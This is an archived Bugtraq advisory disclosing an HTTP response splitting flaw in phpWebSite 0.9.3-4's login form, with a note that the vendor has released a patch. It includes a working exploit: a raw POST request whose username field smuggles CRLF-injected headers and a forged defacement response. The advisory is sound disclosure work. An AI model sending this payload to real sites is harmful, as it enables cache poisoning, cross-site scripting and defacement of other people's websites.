[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: security hole (http response splitting) in phpwebsite
From: "Maestro De-Seguridad" <maestrodeseguridad () lycos ! com>
Date: 2004-11-11 19:55:35
Message-ID: 20041111195535.4FBBC3384C () ws7-3 ! us4 ! outblaze ! com
[Download RAW message or body]
ADVISORY
Author: Maestro (me!)
Date: 11-NOV-04
Vendor: Appalachian State University (http://phpwebsite.appstate.edu/)
Product: phpWebSite 0.9.3-4
Product description (from vendor website):
phpWebSite provides a complete web site content management system. Web-based \
administration allows for easy maintenance of interactive, community-driven web \
sites. phpWebSite's growing number of modules allow for easy site customization \
without the need for unwanted or unused features. Client output from phpWebSite is \
valid XHTML 1.0 and meets the W3C's Web Accessibility Initiative requirements. \
phpWebSite is written in the PHP Programming Language, making it ideal for developers \
to write customized modules.
Problem: Http response splitting (web cache poisoning, xss,
yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 218
Connection: Keep-Alive
module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTT \
P/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}This \
site in 0wned{/html}&password=foobar
(replace curly braces with lessthan and greaterthan)
Vendor status: The vendor fixed this problem (11-NOV-04).
From vendor security mail list:
A security vulnerability was brought to our attention recently and we
have posted a patch to resolve this issue. The patch can be
downloaded
from here:
http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
md5sum: fcefda44a8d691c844593d815479a1ce
This patch should only be applied to versions 0.9.3-2 or greater. All
you need to do is untar the file in the base directory of your
phpwebsite install.
--
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic